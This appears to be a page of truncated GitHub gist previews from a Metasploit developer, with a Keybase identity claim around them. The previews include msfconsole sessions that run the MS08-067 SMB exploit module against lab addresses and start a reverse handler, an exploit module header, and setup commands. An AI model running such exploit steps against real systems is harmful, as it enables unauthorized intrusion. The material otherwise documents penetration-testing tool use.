I hereby claim:
- I am wchen-r7 on github.
- I am wchenr7 (https://keybase.io/wchenr7) on keybase.
- I have a public key whose fingerprint is D20B 6DC3 3C6B 7252 71A2 258E 2384 DB4E F06F 730B
To claim this, I am signing this object:
msf > irb | |
[*] Starting IRB shell... | |
>> require 'method_source' | |
=> true | |
>> framework.db.method(:import_ip_list_file).source_location | |
=> ["/Users/sinn3r/rapid7/msf/lib/msf/core/db_manager/import/ip_list.rb", 18] | |
>> framework.db.method(:import_ip_list_file).parameters | |
=> [[:opt, :args]] | |
>> puts framework.db.method(:import_ip_list_file).source |
$ ./msfconsole -q | |
msf > use exploit/windows/smb/ms08_067_netapi | |
msf exploit(ms08_067_netapi) > set rhost 192.168.1.80 | |
rhost => 192.168.1.80 | |
msf exploit(ms08_067_netapi) > check | |
[+] 192.168.1.80:445 - The target is vulnerable. | |
msf exploit(ms08_067_netapi) > run | |
[*] Started reverse handler on 192.168.1.64:4444 | |
[*] Automatically detecting the target... |
# | |
# $Id$ | |
# $Revision$ | |
# | |
module Msf | |
### | |
# | |
# This class hooks all session creation events and plays a sound |
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = NormalRanking |
sinn3r $ cd ~/rapid7/msf | |
sinn3r $ bundle install | |
Resolving dependencies... | |
Using rake 10.4.2 | |
Using i18n 0.6.11 | |
Using multi_json 1.0.4 | |
Using activesupport 3.2.21 | |
Using builder 3.0.4 | |
Using activemodel 3.2.21 | |
Using erubis 2.7.0 |
sinn3r$ rvm use ruby-1.9.3-p448 | |
Using /Users/sinn3r/.rvm/gems/ruby-1.9.3-p448 | |
sinn3r$ ./msfpayload -h | |
[!] ************************************************************************ | |
[!] * The utility msfpayload is deprecated! * | |
[!] * It will be removed on or about 2015-06-08 * | |
[!] * Please use msfvenom instead * | |
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * | |
[!] ************************************************************************ | |
Could not find rake-10.4.2 in any of the sources |
sudo apt-get -y install \ | |
build-essential zlib1g zlib1g-dev \ | |
libxml2 libxml2-dev libxslt-dev locate \ | |
libreadline6-dev libcurl4-openssl-dev git-core \ | |
libssl-dev libyaml-dev openssl autoconf libtool \ | |
ncurses-dev bison curl wget postgresql \ | |
postgresql-contrib libpq-dev \ | |
libapr1 libaprutil1 libsvn1 \ | |
libpcap-dev libsqlite3-dev |
$ msfconsole | |
msf > set rhost 192.168.1.148 | |
rhost => 192.168.1.148 | |
msf > use exploit/windows/smb/ms08_067_netapi | |
msf exploit(ms08_067_netapi) > show options | |
Module options (exploit/windows/smb/ms08_067_netapi): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- |
msf > workspace -a demo_for_steve | |
[*] Added workspace: demo_for_steve | |
msf > hosts -a "192.168.1.200" <---- Say you wanna modify this host's name and comments | |
[*] Time: 2015-03-07 19:58:45 UTC Host: host=192.168.1.200 | |
msf > irb | |
[*] Starting IRB shell... | |
>> id = framework.db.get_host(:address => '192.168.1.200').id | |
=> 488 | |
>> framework.db.hosts.update(id, :comments => "This is a new comment") |
I hereby claim:
To claim this, I am signing this object: